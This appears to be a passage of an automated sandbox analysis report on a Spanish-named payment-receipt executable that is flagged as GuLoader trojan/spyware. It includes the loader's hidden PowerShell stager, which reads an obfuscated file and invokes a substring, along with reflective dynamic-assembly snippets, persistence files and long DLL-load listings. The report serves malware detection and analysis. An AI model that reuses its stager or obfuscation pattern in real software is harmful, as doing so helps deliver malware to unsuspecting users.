            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_240115F86_2_240115F8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24016A076_2_24016A07
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24016A186_2_24016A18
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_240146206_2_24014620
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_240146226_2_24014622
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24011A4F6_2_24011A4F
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24011A506_2_24011A50
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_2401EE576_2_2401EE57
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_2401CE676_2_2401CE67
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_2401EE686_2_2401EE68
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24016E706_2_24016E70
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24014A706_2_24014A70
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24016E726_2_24016E72
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_2401CE786_2_2401CE78
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24014A786_2_24014A78
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24011E986_2_24011E98
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24011EA86_2_24011EA8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_240172C86_2_240172C8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_240172CA6_2_240172CA
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24014ECC6_2_24014ECC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24014ED06_2_24014ED0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_2401F2E76_2_2401F2E7
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_240122F06_2_240122F0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_2401D2F76_2_2401D2F7
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_2401F2F86_2_2401F2F8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_240123006_2_24012300
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_2401B3076_2_2401B307
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_2401D3086_2_2401D308
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_2401B3186_2_2401B318
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_240177206_2_24017720
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_240177226_2_24017722
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_240153286_2_24015328
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_240127486_2_24012748
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_240127586_2_24012758
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24017B696_2_24017B69
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_240157776_2_24015777
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_2401F7786_2_2401F778
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_240157806_2_24015780
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_2401D7876_2_2401D787
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_2401F7886_2_2401F788
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_2401B7986_2_2401B798
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_2401D7986_2_2401D798
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24018FA16_2_24018FA1
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24012BA06_2_24012BA0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24012BB06_2_24012BB0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24015BD86_2_24015BD8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24012FF96_2_24012FF9
            Source: Justificante pago-09453256434687.exeStatic PE information: invalid certificate
            Source: Justificante pago-09453256434687.exe, 00000000.00000000.1675896585.0000000000454000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebiddens lokalsamfund.exe4 vs Justificante pago-09453256434687.exe
            Source: Justificante pago-09453256434687.exeBinary or memory string: OriginalFilenamebiddens lokalsamfund.exe4 vs Justificante pago-09453256434687.exe
            Source: Justificante pago-09453256434687.exe.1.drBinary or memory string: OriginalFilenamebiddens lokalsamfund.exe4 vs Justificante pago-09453256434687.exe
            Source: Justificante pago-09453256434687.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/16@5/5
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeCode function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034F7
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeCode function: 0_2_00404954 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404954
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semitelic.iniJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7536:120:WilError_03
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeFile created: C:\Users\user\AppData\Local\Temp\nsj7D4D.tmpJump to behavior
            Source: Justificante pago-09453256434687.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeFile read: C:\Users\user\Desktop\Justificante pago-09453256434687.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Justificante pago-09453256434687.exe "C:\Users\user\Desktop\Justificante pago-09453256434687.exe"
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Subwayed=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Forhaandsudtalelses.Pot162';$Raadslagningens=$Subwayed.SubString(68150,3);.$Raadslagningens($Subwayed) "
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Subwayed=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Forhaandsudtalelses.Pot162';$Raadslagningens=$Subwayed.SubString(68150,3);.$Raadslagningens($Subwayed) "Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: Justificante pago-09453256434687.exeStatic file information: File size 1106880 > 1048576
            Source: Justificante pago-09453256434687.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\Windows\System.Core.pdb source: powershell.exe, 00000001.00000002.2065851466.000000000823C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb\c source: powershell.exe, 00000001.00000002.2065851466.0000000008272000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: stem.Core.pdb source: powershell.exe, 00000001.00000002.2065851466.000000000823C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000001.00000002.2065851466.0000000008272000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Yara detected GuLoader
            Source: Yara matchFile source: 00000001.00000002.2067270709.0000000009B22000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Found suspicious powershell code related to unpacking or dynamic code loading
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Skattekoden $Sipped $newsgirls), (Cirkler @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Thysanouran = [AppDomain]::CurrentDomain.GetAssemblies()$global:A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($chanceled)), $Hydrophilism).DefineDynamicModule($Pasodoble, $false).DefineType($Kiwitrtes203, $Dybdeboring, [System.MulticastDelegate]
            Suspicious powershell command line found
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Subwayed=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Forhaandsudtalelses.Pot162';$Raadslagningens=$Subwayed.SubString(68150,3);.$Raadslagningens($Subwayed) "
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Subwayed=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Forhaandsudtalelses.Pot162';$Raadslagningens=$Subwayed.SubString(68150,3);.$Raadslagningens($Subwayed) "Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00D1A5B2 push eax; iretd 1_2_00D1A6B1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00D1A627 push eax; iretd 1_2_00D1A6B1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00D1EA19 push eax; mov dword ptr [esp], edx1_2_00D1EA2C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_070A4365 push eax; retf 1_2_070A4379
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_070A0FC4 push es; iretd 1_2_070A0FC7
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08FB56A5 push ebp; iretd 1_2_08FB56B4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08FB6C44 push ecx; ret 1_2_08FB6C45
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08FB5E0B push ebx; ret 1_2_08FB5E0C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08FB3D9A push esp; iretd 1_2_08FB3D97
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08FB3D69 push esp; iretd 1_2_08FB3D97
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_042E6C44 push ecx; ret 6_2_042E6C45
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_042E3D69 push esp; iretd 6_2_042E3D97
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_042E3D9A push esp; iretd 6_2_042E3D97
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_042E5E0B push ebx; ret 6_2_042E5E0C
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_042E56A5 push ebp; iretd 6_2_042E56B4
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeFile created: C:\Users\user\AppData\Local\Temp\nsj887A.tmp\nsExec.dllJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\forslvedes\Justificante pago-09453256434687.exeJump to dropped file
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semitelic.iniJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
